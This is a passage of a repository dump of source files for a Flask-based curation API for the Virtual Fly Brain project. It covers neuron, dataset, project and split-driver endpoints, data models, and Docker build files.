"text": "import logging\n\nfrom flask import request\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.business import create_project, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import project\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('project', description='Operations related to neurons')\n\[email protected]('/')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('projectid', 'The four letter ID of the project', required=True)\nclass ProjectResource(Resource):\n # @api.response(201, 'Project successfully created.')\n # @api.expect(project)\n # @api.marshal_with(project)\n # def post(self):\n # parser = reqparse.RequestParser()\n # parser.add_argument('apikey', type=str, required=True)\n # parser.add_argument('projectid', type=str, required=True)\n # parser.add_argument('orcid', type=str, required=True)\n # pid = create_project(request.json)\n # return db.get_project(pid), 201\n\n @api.marshal_with(project)\n @api.response(404, 'Project not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('projectid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n projectid = args['projectid']\n if valid_user(apikey, orcid):\n return db.get_project(projectid, orcid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.7583565711975098,
"alphanum_fraction": 0.761838436126709,
"avg_line_length": 45.32258224487305,
"blob_id": "ea684ea13d996411b34cfff18c7fb97d6f3ebe55",
"content_id": "93c4a98084aa665664a05ae69ce1dd5562892d09",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2872,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 62,
"path": "/vfb_curation_api/app.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging.config\n\nimport os\nfrom flask import Flask, Blueprint\nfrom vfb_curation_api import settings\nfrom vfb_curation_api.api.vfbid.endpoints.datasets import ns as datasets_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.dataset import ns as dataset_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neurons import ns as neurons_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neuron_type import ns as neuron_type_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neuron import ns as neuron_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.project import ns as project_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.projects import ns as projects_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.login import ns as login_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.user import ns as user_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.split import ns as split_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.ep_split import ns as ep_split_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.ep_split_flp_out import ns as ep_split_flp_out_namespace\nfrom vfb_curation_api.api.restplus import api\n\napp = Flask(__name__)\nlogging_conf_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '../logging.conf'))\nlogging.config.fileConfig(logging_conf_path)\nlog = logging.getLogger(__name__)\n\n\ndef configure_app(flask_app):\n flask_app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\n flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\n flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = settings.RESTPLUS_SWAGGER_UI_DOC_EXPANSION\n flask_app.config['RESTPLUS_VALIDATE'] = settings.RESTPLUS_VALIDATE\n flask_app.config['RESTPLUS_MASK_SWAGGER'] = settings.RESTPLUS_MASK_SWAGGER\n flask_app.config['ERROR_404_HELP'] = settings.RESTPLUS_ERROR_404_HELP\n flask_app.config['LOAD_TEST_DATA'] = settings.LOAD_TEST_DATA\n\n\ndef initialize_app(flask_app):\n configure_app(flask_app)\n blueprint = Blueprint('api', __name__, url_prefix='/api')\n api.init_app(blueprint)\n api.add_namespace(login_namespace)\n api.add_namespace(user_namespace)\n api.add_namespace(projects_namespace)\n api.add_namespace(datasets_namespace)\n api.add_namespace(neurons_namespace)\n api.add_namespace(neuron_type_namespace)\n api.add_namespace(project_namespace)\n api.add_namespace(dataset_namespace)\n api.add_namespace(neuron_namespace)\n api.add_namespace(split_namespace)\n api.add_namespace(ep_split_namespace)\n api.add_namespace(ep_split_flp_out_namespace)\n flask_app.register_blueprint(blueprint)\n\n\ndef main():\n initialize_app(app)\n log.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))\n app.run(host='0.0.0.0', debug=settings.FLASK_DEBUG)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6322314143180847,
"alphanum_fraction": 0.64462810754776,
"avg_line_length": 23.299999237060547,
"blob_id": "8482ec04e4a7ab6a8cc68f66e1bb8fb2afbdf6b8",
"content_id": "cfd4cc056529695f7bc42549eebb3df9fb5d273a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 242,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 10,
"path": "/Makefile",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "VERSION = \"v0.0.1\" \nIM=matentzn/vfb-data-ingest-api\n\ndocker-build:\n\t@docker build -t $(IM):$(VERSION) . \\\n\t&& docker tag $(IM):$(VERSION) $(IM):latest\n\ndocker-publish: docker-build\n\t@docker push $(IM):$(VERSION) \\\n\t&& docker push $(IM):latest"
},
{
"alpha_fraction": 0.6480036973953247,
"alphanum_fraction": 0.6507572531700134,
"avg_line_length": 35.93220520019531,
"blob_id": "c3350684a4f11a11092d25290a8d547b4b5c3c0a",
"content_id": "2c15fe829d6e40004a4cb91e8acb5a7e001c96c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2179,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 59,
"path": "/vfb_curation_api/api/vfbid/endpoints/user.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import user\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\nfrom vfb_curation_api.database.models import Role\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('user', description='Operations related to user')\n\n\[email protected]('/')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass UserResource(Resource):\n # @api.response(201, 'User successfully created.')\n # @api.expect(user)\n # @api.marshal_with(user)\n # def post(self):\n # return \"{ error: 'Not supported'}\", 201\n\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_user(orcid)\n return \"{ error: 'Invalid API Key' }\"\n\n\[email protected]('/admin/', doc=False)\[email protected]('admin_apikey', 'Admin API Key', required=True)\[email protected]('admin_orcid', 'Admin ORCID', required=True)\[email protected]('user_orcid', 'User ORCID to query', required=True)\nclass UserAdmin(Resource):\n\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('admin_apikey', type=str, required=True)\n parser.add_argument('admin_orcid', type=str, required=True)\n parser.add_argument('user_orcid', type=str, required=True)\n args = parser.parse_args()\n admin_apikey = args['admin_apikey']\n admin_orcid = args['admin_orcid']\n user_orcid = args['user_orcid']\n if valid_user(admin_apikey, admin_orcid):\n if db.get_user(admin_orcid).role == Role.admin.name:\n return db.get_user(user_orcid)\n else:\n return \"{ error: 'Not authorized Admin request' }\"\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.5864592790603638,
"alphanum_fraction": 0.5943275094032288,
"avg_line_length": 25.92118263244629,
"blob_id": "90447f1bc2f98f64f0bb7be9b7f1d763fddcd602",
"content_id": "2f67756e00b91e7a5529381e71746ace22d970c5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5475,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 203,
"path": "/vfb_curation_api/database/models.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\n\nclass Dataset:\n def __init__(self, id, short_name, title):\n self.id = id\n self.short_name = short_name\n self.title = title\n self.publication = \"\"\n self.projectid = \"\"\n self.source_data = \"\"\n self.description = \"\"\n self.license = \"\"\n\n\n def set_publication(self, publication):\n self.publication = publication\n\n def set_source_data(self, source_data):\n self.source_data = source_data\n\n def set_project_id(self, projectid):\n self.projectid = projectid\n\n def set_description(self, description):\n self.description = description\n\n def set_license(self, license):\n self.license = license\n\n def __repr__(self):\n return '<Dataset %r>' % self.title\n\n\nclass Neuron:\n def __init__(self, primary_name):\n self.primary_name = primary_name # label\n self.id = \"\"\n self.datasetid = \"\"\n self.projectid = \"\"\n # self.type_specimen = \"\" # Removed for now, deal with this via add NeuronType\n self.alternative_names = []\n self.external_identifiers = []\n # self.external_identifiers = dict() # { GO: 001 }\n self.classification = [] # [http://..., ]\n self.classification_comment = \"\"\n # self.url_skeleton_id = \"\"\n self.template_id = \"\" # \"grc2018\"\n self.filename = \"\"\n self.imaging_type = \"\" #computer graphic\n self.part_of = [] # part_of http://purl.obolibrary.org/obo/BFO_0000050\n self.driver_line = [] # expresses http://purl.obolibrary.org/obo/RO_0002292\n self.neuropils = [] # overlaps’ http://purl.obolibrary.org/obo/RO_0002131\n self.input_neuropils = [] # ‘has postsynaptic terminal in’ http://purl.obolibrary.org/obo/RO_0002110\n self.output_neuropils = [] # ‘has presynaptic terminal in’ http://purl.obolibrary.org/obo/RO_0002113\n self.comment = \"\"\n\n def set_id(self, id):\n self.id = id\n\n def set_datasetid(self, datasetid):\n self.datasetid = datasetid\n\n def set_project_id(self, projectid):\n self.projectid = projectid\n\n def set_type_specimen(self, type_specimen):\n self.type_specimen = type_specimen\n\n def set_alternative_names(self, alternative_names):\n self.alternative_names = alternative_names\n\n def set_external_identifiers(self, external_identifiers):\n self.external_identifiers = external_identifiers\n\n def set_classification(self, classification):\n self.classification = classification\n\n def set_filename(self, filename):\n self.filename = filename\n\n def set_neuropils(self, neuropils):\n self.neuropils = neuropils\n\n def set_input_neuropils(self, input_neuropils):\n self.input_neuropils = input_neuropils\n\n def set_output_neuropils(self, output_neuropils):\n self.output_neuropils = output_neuropils\n\n def set_driver_line(self, driver_line):\n self.driver_line = driver_line\n\n def set_part_of(self, part_of):\n self.part_of = part_of\n\n def set_classification_comment(self, classification_comment):\n self.classification_comment = classification_comment\n\n # def set_url_skeleton_id(self, url_skeleton_id):\n # self.url_skeleton_id = url_skeleton_id\n\n def set_template_id(self, template_id):\n self.template_id = template_id\n\n def set_imaging_type(self, imaging_type):\n self.imaging_type = imaging_type\n\n def set_comment(self, comment):\n self.comment = comment\n\n def __repr__(self):\n return '<Neuron %r>' % self.primary_name\n\n\nclass Project:\n def __init__(self, id):\n self.id = id\n self.primary_name = \"\"\n self.description = \"\"\n self.start = 0\n\n def set_primary_name(self, primary_name):\n self.primary_name = primary_name\n\n def set_description(self, description):\n self.description = description\n\n def set_start(self, start):\n self.start = start\n\n def __repr__(self):\n return '<Project %r>' % self.id\n\n\nclass User:\n def __init__(self, orcid, primary_name, apikey, role=None, email=None):\n self.orcid = orcid\n self.primary_name = primary_name\n self.apikey = apikey\n self.role = role\n self.email = email\n self.manages_projects = []\n\n def __repr__(self):\n return '<User %r>' % self.id\n\n\nRole = Enum('Role', 'admin user')\n\n\nclass NeuronType:\n def __init__(self, id):\n self.id = id\n self.synonyms = []\n self.parent = \"\"\n # self.supertype = \"\" Why neeed that?\n self.label = \"\"\n self.exemplar = \"\"\n\n\nclass Site:\n def __init__(self, id):\n self.id = id\n self.url = \"\"\n self.short_form = \"\"\n\n\nclass Split:\n def __init__(self, dbd, ad):\n self.id = \"\"\n self.dbd = dbd\n self.ad = ad\n self.synonyms = []\n self.xrefs = []\n\n def set_id(self, split_id):\n self.id = split_id\n\n def set_dbd(self, dbd):\n self.dbd = dbd\n\n def set_ad(self, ad):\n self.ad = ad\n\n def set_synonyms(self, synonyms):\n self.synonyms = synonyms\n\n def set_xrefs(self, xrefs):\n self.xrefs = xrefs\n\n def __repr__(self):\n return '<Split %r>' % self.id\n\n\nclass SplitDriver(Neuron):\n\n def __init__(self, primary_name):\n super().__init__(primary_name)\n self.has_part = []\n\n def set_has_part(self, has_part):\n self.has_part = has_part\n"
},
{
"alpha_fraction": 0.6350975036621094,
"alphanum_fraction": 0.6545960903167725,
"avg_line_length": 30.217391967773438,
"blob_id": "911ffdc352f2817f05c03c4150a4314a5a01bc19",
"content_id": "3be87fed16954c91d128317cd16f52b65691d5ba",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 23,
"path": "/setup.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name='vfb_curation_api',\n version='1.0.0',\n description='An API that encapsulates curation processes of the Virtual Flybrain Project',\n url='https://github.com/VirtualFlyBrain/vfb_curation_api',\n author='Nicolas Matentzoglu',\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Virtual Fly Brain',\n 'License :: Apache License Version 2.0',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='rest flask swagger flask-restplus virtual-fly-brain',\n\n packages=find_packages(),\n\n install_requires=['flask-restplus==0.13', 'Flask-SQLAlchemy==2.4.1'],\n)\n"
},
{
"alpha_fraction": 0.594936728477478,
"alphanum_fraction": 0.6962025165557861,
"avg_line_length": 18.75,
"blob_id": "4a3ab5fbb8d1238276a2bdf66f3b2458ff6c961c",
"content_id": "11aa4971fccc3b3110f4b0a7c5c04884380a07cf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nset -e\ndocker build -t vapi .\ndocker run -p 5000:5000 vapi\n"
},
{
"alpha_fraction": 0.7326968908309937,
"alphanum_fraction": 0.753381073474884,
"avg_line_length": 32.105262756347656,
"blob_id": "f4db545a817ba2bb2fe2b10400c60714dafaee60",
"content_id": "281e6fd29f43d8474ef8a8a1b693345d2832b15b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1257,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 38,
"path": "/Dockerfile",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "FROM python:3.8\n\nENV KBserver=http://localhost:7474\nENV KBuser=neo4j\nENV KBpassword=password\nENV LOAD_TEST_DATA=True\nENV REDIRECT_LOGIN=\"http://localhost:8080/dataingest-ui/user\"\nENV CLIENT_SECRET=\"UNKNOWN\"\nENV CLIENT_ID=\"APP-ENQTIY7Z904S6O1W\"\nENV CLIENT_ID_AUTHORISATION = \"\"\nENV CLIENT_SECRET_AUTHORISATION = \"\"\nENV REDIRECT_URI_AUTHORISATION = \"\"\nENV ENDPOINT_AUTHORISATION_TOKEN = \"\"\n\n\nRUN mkdir /code /code/vfb_curation_api/\nADD requirements.txt run.sh setup.py logging.conf /code/\n\nRUN chmod 777 /code/run.sh\nRUN pip install -r /code/requirements.txt\nADD vfb_curation_api/database /code/vfb_curation_api/database\nADD vfb_curation_api/api /code/vfb_curation_api/api\nADD vfb_curation_api/app.py vfb_curation_api/db.sqlite vfb_curation_api/settings.py /code/vfb_curation_api/\nWORKDIR /code\n\nRUN echo \"Installing VFB neo4j tools\" && \\\ncd /tmp && \\\ngit clone --quiet https://github.com/VirtualFlyBrain/VFB_neo4j.git\n\nRUN pip install -r /tmp/VFB_neo4j/requirements.txt\n\nRUN mkdir -p /code/vfb_curation_api/vfb && \\\nmv /tmp/VFB_neo4j/src/* /code/vfb_curation_api/vfb\n\nRUN cd /code && python3 setup.py develop\nRUN ls -l /code && ls -l /code/vfb_curation_api && ls -l /code/vfb_curation_api/vfb\n\nENTRYPOINT bash -c \"cd /code; python3 vfb_curation_api/app.py\""
},
{
"alpha_fraction": 0.6479928493499756,
"alphanum_fraction": 0.6483497023582458,
"avg_line_length": 38.195804595947266,
"blob_id": "abb2501d4ab96f2bd85b36ad73d40cfd45b16a81",
"content_id": "f06c56dd8f12e1cb9de19f705d28f9e1e057b630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5605,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 143,
"path": "/vfb_curation_api/api/vfbid/business.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import sys\nfrom vfb_curation_api.database.models import Neuron, Dataset, Project, NeuronType, Site, Split, SplitDriver\nfrom vfb_curation_api.database.repository import db\nfrom vfb_curation_api.api.vfbid.errorcodes import UNKNOWNERROR\n\n\ndef create_dataset(data, orcid):\n short_name = data.get('short_name')\n title = data.get('title')\n publication = data.get('publication')\n project = data.get('projectid')\n description = data.get('description')\n source_data = data.get('source_data')\n license = data.get('license')\n ds = Dataset(orcid, short_name, title)\n ds.set_project_id(project)\n ds.set_publication(publication)\n ds.set_source_data(source_data)\n ds.set_description(description)\n ds.set_license(license)\n return db.create_dataset(ds, project, orcid)\n\n\ndef create_neuron(data_all, orcid):\n neurons = []\n for data in data_all['neurons']:\n primary_name = data.get('primary_name')\n type_specimen = data.get('type_specimen')\n alternative_names = data.get('alternative_names')\n external_identifiers = data.get('external_identifiers')\n classification = data.get('classification')\n datasetid = data.get('datasetid')\n classification_comment = data.get('classification_comment')\n url_skeleton_id = data.get('url_skeleton_id')\n template_id = data.get('template_id')\n imaging_type = data.get('imaging_type')\n filename = data.get('filename')\n part_of = data.get('part_of')\n driver_line = data.get('driver_line')\n neuropils = data.get('neuropils')\n input_neuropils = data.get('input_neuropils')\n output_neuropils = data.get('output_neuropils')\n comment = data.get('comment')\n n = Neuron(primary_name)\n n.set_type_specimen(type_specimen)\n n.set_alternative_names(alternative_names)\n n.set_classification(classification)\n n.set_external_identifiers(external_identifiers)\n n.set_template_id(template_id)\n n.set_imaging_type(imaging_type)\n n.set_classification_comment(classification_comment)\n n.set_filename(filename)\n n.set_part_of(part_of)\n n.set_driver_line(driver_line)\n n.set_neuropils(neuropils)\n n.set_input_neuropils(input_neuropils)\n n.set_output_neuropils(output_neuropils)\n n.set_comment(comment)\n neurons.append(n)\n try:\n result = db.create_neuron_db(neurons=neurons,datasetid=datasetid,orcid=orcid)\n return result\n except Exception as e:\n db.clear_neo_logs()\n print(e.with_traceback())\n print(sys.exc_info()[2])\n return db.wrap_error([\"Unknown error has occured while adding neurons ({})\".format(str(type(e)))], UNKNOWNERROR)\n\n\ndef create_project(data):\n projectid = data.get('projectid')\n ds = Project(projectid)\n return db.create_project_db(ds)\n\n\ndef create_neuron_type(data):\n neuron_type_id = data.get('neuron_type_id')\n ds = NeuronType(neuron_type_id)\n return db.create_neuron_type_db(ds)\n\n\ndef valid_user(apikey, orcid):\n return db.valid_user(apikey, orcid)\n\n\ndef create_split(data):\n # split_id = data.get('split_id')\n split = Split(data.get('dbd'), data.get('ad'))\n if 'synonyms' in data:\n split.set_synonyms(data.get('synonyms'))\n if 'xrefs' in data:\n split.set_xrefs(data.get('xrefs'))\n return db.create_split(split)\n\n\ndef create_ep_split(data_all, orcid, ep_split_flp_out=False):\n split_drivers = []\n for data in data_all['split_drivers']:\n primary_name = data.get('primary_name')\n type_specimen = data.get('type_specimen')\n alternative_names = data.get('alternative_names')\n external_identifiers = data.get('external_identifiers')\n classification = data.get('classification')\n datasetid = data.get('datasetid')\n classification_comment = data.get('classification_comment')\n url_skeleton_id = data.get('url_skeleton_id')\n template_id = data.get('template_id')\n imaging_type = data.get('imaging_type')\n filename = data.get('filename')\n part_of = data.get('part_of')\n driver_line = data.get('driver_line')\n neuropils = data.get('neuropils')\n input_neuropils = data.get('input_neuropils')\n output_neuropils = data.get('output_neuropils')\n comment = data.get('comment')\n neurons = data.get('split_drivers')\n sd = SplitDriver(primary_name)\n sd.set_type_specimen(type_specimen)\n sd.set_alternative_names(alternative_names)\n sd.set_classification(classification)\n sd.set_external_identifiers(external_identifiers)\n sd.set_template_id(template_id)\n sd.set_imaging_type(imaging_type)\n sd.set_classification_comment(classification_comment)\n sd.set_filename(filename)\n sd.set_part_of(part_of)\n sd.set_driver_line(driver_line)\n sd.set_neuropils(neuropils)\n sd.set_input_neuropils(input_neuropils)\n sd.set_output_neuropils(output_neuropils)\n sd.set_comment(comment)\n sd.set_has_part(neurons)\n\n split_drivers.append(sd)\n try:\n result = db.create_split_driver_db(split_drivers=split_drivers, datasetid=datasetid, orcid=orcid,\n ep_split_flp_out=ep_split_flp_out)\n return result\n except Exception as e:\n db.clear_neo_logs()\n print(e.with_traceback())\n print(sys.exc_info()[2])\n return db.wrap_error([\"Unknown error has occured while adding split driver ({})\".format(str(type(e)))], UNKNOWNERROR)\n"
},
{
"alpha_fraction": 0.6908055543899536,
"alphanum_fraction": 0.6932465434074402,
"avg_line_length": 35.14706039428711,
"blob_id": "3439805ecbd48954bde5f334e685e5c2f4c6c41d",
"content_id": "99bb787bc82c5ab9229ded4dc9e346a7753219bf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/vfb_curation_api/api/vfbid/endpoints/datasets.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import dataset\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('datasets', description='Operations related to lists of datasets')\n\n\[email protected]('/')\[email protected](404, 'No datasets found.')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('projectid', 'The VFB Project ID', required=True)\nclass DatasetList(Resource):\n\n @api.marshal_with(dataset,envelope=\"datasets\")\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('projectid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n projectid = args['projectid']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_all_datasets(projectid, orcid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6108336448669434,
"alphanum_fraction": 0.620053768157959,
"avg_line_length": 37.29411697387695,
"blob_id": "a8f8098a92295b0c6e80f685f95515d3d2532290",
"content_id": "cd9455f57855125d2ef9b4b81d883317d5f3eb8f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2603,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 68,
"path": "/vfb_curation_api/api/vfbid/endpoints/split.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_split, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import split\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('split', description='Operations related to split')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass SplitResource(Resource):\n\n @api.response(201, 'Split successfully created.')\n @api.expect(split)\n def post(self):\n out = dict()\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n splitid = create_split(request.json)\n if isinstance(splitid, dict) and 'error' in splitid:\n return splitid, 403\n return splitid, 201\n out['error'] = \"Invalid API Key\"\n out['code'] = INVALID_APIKEY\n return out, 403\n\n @api.response(404, 'Split not found.')\n @api.param('splitid', 'Split id')\n @api.param('dbd', 'The DBD hemidriver.')\n @api.param('ad', 'The AD hemidriver.')\n # @api.marshal_with(split)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('splitid', type=str)\n parser.add_argument('dbd', type=str)\n parser.add_argument('ad', type=str)\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n\n if valid_user(apikey, orcid):\n if 'splitid' in args and args['splitid']:\n splitid = args['splitid']\n elif 'dbd' in args and 'ad' in args and args['dbd'] and args['ad']:\n splitid = 'VFBexp_' + args['dbd'] + args['ad']\n else:\n return \"{ error: 'splitid or (dbd and ad) should be provided' }\", 403\n\n print(splitid)\n ds = db.get_split(splitid, orcid)\n print(json.dumps(marshal(ds, split)))\n return marshal(ds, split), 201\n return \"{ error: 'Invalid API Key' }\", 403"
},
{
"alpha_fraction": 0.7302913665771484,
"alphanum_fraction": 0.7322114109992981,
"avg_line_length": 69.26984405517578,
"blob_id": "47ad39abe53f9b955ef03e0e27bbc1eb182a63bf",
"content_id": "e74d39b80dbebef3d35a4bdd6bb77117acfe5c81",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8854,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 126,
"path": "/vfb_curation_api/api/vfbid/serializers.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from flask_restplus import fields\nfrom vfb_curation_api.api.restplus import api\n\n# pagination = api.model('A page of results', {\n# 'page': fields.Integer(description='Number of this page of results'),\n# 'pages': fields.Integer(description='Total number of pages of results'),\n# 'per_page': fields.Integer(description='Number of items per page of results'),\n# 'total': fields.Integer(description='Total number of results'),\n# })\n\ndataset = api.model('Dataset', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this dataset. Will be set automatically.'),\n 'short_name': fields.String(required=True, description='Short id for dataset. No special characters or spaces. Example: WoodHartenstein2018.'),\n 'projectid': fields.String(required=True, description='The four letter ID of your Project.'),\n 'title': fields.String(required=True, description='Human-readable name for dataset. Example: \"L3 neuropils (WoodHartenstein2018)\".'),\n 'publication': fields.String(required=False, description='Associated publication (optional).'),\n 'source_data': fields.String(required=False, description='URL to dataset (optional). Example: \"http://flybase.org/reports/FBrf0221438.html\"'),\n 'description': fields.String(required=False, description='Short description dataset (optional).'),\n 'license': fields.String(required=False, description='License of dataset (optional).'),\n})\n\ndatasetid = api.model('DatasetID', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this dataset.',skip_none=True),\n})\n\nexternal_identifier = api.model('ExternalID', {\n 'resource_id': fields.String(description='The ID of an external resource, such as a website or database (must be valid in VFB).',skip_none=True),\n 'external_id': fields.String(description='The unique identifier of an object, such as a neuron, in the context of the resource.',skip_none=True),\n})\n\n\n\nneuron = api.model('Neuron', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this neuron - will be ignored when posting new neurons.'),\n #'orcid': fields.String(required=True, description='The ORCID of the user'),\n 'primary_name': fields.String(required=True, description='Primary name of the neuron.'),\n 'datasetid': fields.String(required=True, description='Dataset ID.'),\n 'projectid': fields.String(required=False, description='Project ID.'),\n #'type_specimen': fields.String(required=False, description='Type specimen of the neuron (optional)'),\n 'alternative_names': fields.List(fields.String(required=False), description='List of alternative names / synonyms.'),\n 'external_identifiers': fields.List(fields.Nested(external_identifier), description='List of external identifiers.'),\n 'classification': fields.List(fields.String(required=True), description='Type/Superclass of the neuron.'),\n 'classification_comment': fields.String(required=False, description='Additional comment about the type/superclass of the Neuron.'),\n 'template_id': fields.String(required=True, description='ID of the template used (can be found on VFB website)'),\n 'imaging_type': fields.String(required=False, description='Imaging Type'),\n 'filename': fields.String(required=True, description='Name of the file uploaded to VFB (with extension).'),\n 'driver_line': fields.List(fields.String(required=False), description='Driver line'),\n 'neuropils': fields.List(fields.String(required=False), description='Neuropils'),\n 'part_of': fields.List(fields.String(required=False), description='Part of'),\n 'input_neuropils': fields.List(fields.String(required=False), description='Input neuropils'),\n 'output_neuropils': fields.List(fields.String(required=False), description='Output neuropils'),\n 'comment': fields.String(required=True, description='Comment about the neuron'),\n})\n\nlist_of_neurons = api.model('NeuronList', {\n 'neurons': fields.List(fields.Nested(neuron))\n})\n#\n# page_of_neurons = api.inherit('Page of datasets', pagination, {\n# 'items': 